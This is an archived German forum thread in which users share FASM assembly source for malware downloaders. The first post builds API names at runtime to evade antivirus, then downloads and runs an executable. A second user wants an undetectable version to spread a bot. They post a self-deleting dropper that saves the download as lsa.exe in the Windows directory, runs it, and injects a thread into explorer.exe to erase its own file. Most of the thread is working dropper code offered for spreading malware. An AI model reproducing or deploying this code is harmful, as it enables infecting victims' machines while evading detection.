PDA

Archiv verlassen und diese Seite im Standarddesign anzeigen : [Fasm]Web Downloader



$_staX
11.06.2009, 12:19
Simpler Webdownloader,
keine Ahnung für was man ihn brauchen kann, aber mir war langweilig.


include '%include%/WIN32AX.inc'
.data
url db "url",0
ziel db "C:\test.exe",0

;paar bytes reservieren
urlmon rd 10
Down rd 18
dllhandle rd 1
DownloadFile rd 1

.code
main:
;urlmon.dll runtime schreiben, wegen Avs
mov dword [urlmon], 'U3SM'
mov dword [urlmon+4d], 'ON.D'
mov word [urlmon+1d], 'RL'
mov word [urlmon+8d], 'LL'
;urlmon.dll laden
push urlmon
call [LoadLibraryA]
mov [dllhandle],eax
;URLDownloadToFileA runtime schreiben
mov dword [Down], 'UbcD'
mov dword [Down+4d], 'ownl'
mov dword [Down+8d], 'oRdT'
mov word [Down+1d], 'RL'
mov dword [Down+12d], 'oFil'
mov word [Down+16d], 'eA'
mov byte [Down+9d], 'a'
;Api Adresse
push Down
push [dllhandle]
call [GetProcAddress]
mov [DownloadFile],eax
;Donwload
push 0
push 0
push ziel
push url
push 0
call [DownloadFile]
;Ausführen
push SW_SHOWNORMAL
push NULL
push NULL
push ziel
push NULL
push HWND_DESKTOP
call [ShellExecuteA]

push 0
call [ExitProcess]

.end main

dr0p
11.06.2009, 12:30
Hab hier auch noch einen, wie siehts mit der Detection Rate von deinem aus? eventuell was gutes für mich zum Bot spreaden wenn er Fud ist.




; Small selfdeleting downloader
; by DiA/RRLF (c)06
; www.vx-dia.de.vu

include "%fasminc%\win32ax.inc"

macro _invoke proc,[arg]
{ common
if ~ arg eq
reverse
pushd arg
common
end if
call [ebp + proc] }

entry DowloadFile

section '.code' code readable writeable executable

URL db "http://url.com/here.exe", 0 ;the executable to download
SaveAs db "\lsa.exe", 0 ;save as, in windows directory

InetHandle dd ?
UrlHandle dd ?
FileHandle dd ?
ReadNext dd ?
DownloadBuffer rb 1024d
BytesWritten dd ?
WindowsDir rb 256d
ProcessEntryOwn PROCESSENTRY32
SnapHandleOwn dd ?
ProcessHandle dd ?
BaseAddress dd ?
StartupInfo STARTUPINFO
ProcessInfo PROCESS_INFORMATION

DowloadFile:
invoke GetWindowsDirectory,\
WindowsDir,\
256d

invoke lstrcat,\
WindowsDir,\
SaveAs

invoke InternetOpen,\
URL,\
0,\
0,\
0,\
0

cmp eax, 0
je DownloadFileError

mov dword [InetHandle], eax

invoke InternetOpenUrl,\
dword [InetHandle],\
URL,\
0,\
0,\
0,\
0

cmp eax, 0
je DownloadFileError

mov dword [UrlHandle], eax

invoke CreateFile,\
WindowsDir,\
GENERIC_WRITE,\
FILE_SHARE_WRITE,\
0,\
CREATE_NEW,\
FILE_ATTRIBUTE_NORMAL,\
0

cmp eax, 0
je DownloadFileError

mov dword [FileHandle], eax

inc dword [ReadNext]

ReadNextBytes:
cmp dword [ReadNext], 0
je DownloadComplete

invoke InternetReadFile,\
dword [UrlHandle],\
DownloadBuffer,\
1024d,\
ReadNext

invoke WriteFile,\
dword [FileHandle],\
DownloadBuffer,\
dword [ReadNext],\
BytesWritten,\
0

jmp ReadNextBytes

DownloadComplete:
invoke CloseHandle,\
dword [FileHandle]

invoke InternetCloseHandle,\
dword [UrlHandle]

invoke InternetCloseHandle,\
dword [InetHandle]

invoke CreateProcess,\
WindowsDir,\
0,\
0,\
0,\
0,\
CREATE_NEW_CONSOLE,\
0,\
0,\
StartupInfo,\
ProcessInfo

DownloadFileError:
invoke GetModuleFileName,\
0,\
OwnFilename,\
256

invoke LoadLibrary,\
"kernel32.dll"

cmp eax, 0
je Exit

invoke GetProcAddress,\
eax,\
"DeleteFileA"
mov dword [_DeleteFile], eax

mov dword [ProcessEntryOwn.dwSize], sizeof.PROCESSENTRY32

invoke CreateToolhelp32Snapshot,\
2,\
0

cmp eax, 0
je Exit

mov dword [SnapHandleOwn], eax

invoke Process32First,\
dword [SnapHandleOwn],\
ProcessEntryOwn

NextTargetProcess:
cmp eax, 0
je Exit

invoke lstrcmpi,\
ProcessEntryOwn.szExeFile,\
"explorer.exe"

cmp eax, 0
je FoundExplorer

invoke Process32Next,\
dword [SnapHandleOwn],\
ProcessEntryOwn

jmp NextTargetProcess

FoundExplorer:
invoke CloseHandle,\
dword [SnapHandleOwn]

invoke OpenProcess,\
PROCESS_VM_OPERATION + PROCESS_VM_WRITE + PROCESS_CREATE_THREAD,\
0,\
dword [ProcessEntryOwn.th32ProcessID]

cmp eax, 0
je Exit

mov dword [ProcessHandle], eax

invoke VirtualAllocEx,\
dword [ProcessHandle],\
0,\
RemoteThreadEnd - RemoteThreadStart,\
MEM_COMMIT,\
PAGE_READWRITE

cmp eax, 0
je Exit

mov dword [BaseAddress], eax

invoke WriteProcessMemory,\
dword [ProcessHandle],\
dword [BaseAddress],\
RemoteThreadStart,\
RemoteThreadEnd - RemoteThreadStart,\
0

cmp eax, 0
je Exit

invoke CreateRemoteThread,\
dword [ProcessHandle],\
0,\
0,\
dword [BaseAddress],\
0,\
0,\
0

invoke CloseHandle,\
dword [ProcessHandle]

Exit:
invoke ExitProcess,\
0

RemoteThreadStart:
call DeltaOffset

DeltaOffset:
pop ebp
sub ebp, DeltaOffset

DeleteLoop:
lea eax, dword [ebp + OwnFilename]

_invoke _DeleteFile,\
eax

cmp eax, 0
je DeleteLoop

ReturnThread:
ret

RemoteDatas:
OwnFilename rb 256d
_DeleteFile dd ?
RemoteThreadEnd:

section '.idata' import data readable writeable
library kernel, "kernel32.dll",\
wininet, "wininet.dll"

import kernel,\
WriteFile, "WriteFile",\
CreateFile, "CreateFileA",\
CloseHandle, "CloseHandle",\
lstrcat, "lstrcatA",\
GetWindowsDirectory, "GetWindowsDirectoryA",\
GetModuleFileName, "GetModuleFileNameA",\
LoadLibrary, "LoadLibraryA",\
GetProcAddress, "GetProcAddress",\
CreateToolhelp32Snapshot, "CreateToolhelp32Snapshot",\
Process32First, "Process32First",\
Process32Next, "Process32Next",\
lstrcmpi, "lstrcmpiA",\
CreateProcess, "CreateProcessA",\
OpenProcess, "OpenProcess",\
VirtualAllocEx, "VirtualAllocEx",\
WriteProcessMemory, "WriteProcessMemory",\
CreateRemoteThread, "CreateRemoteThread",\
ExitProcess, "ExitProcess"

import wininet,\
InternetOpen, "InternetOpenA",\
InternetOpenUrl, "InternetOpenUrlA",\
InternetReadFile, "InternetReadFile",\
InternetCloseHandle, "InternetCloseHandle"

l0dsb
11.06.2009, 13:29
Wieso benutzt ihr Assembler für solche Dinge, ohne irgendeine Notwendigkeit, die Sprache zu verwenden?

$_staX
11.06.2009, 16:46
Wieso benutzt ihr Assembler für solche Dinge, ohne irgendeine Notwendigkeit, die Sprache zu verwenden?

Weil mir langweilig war ;)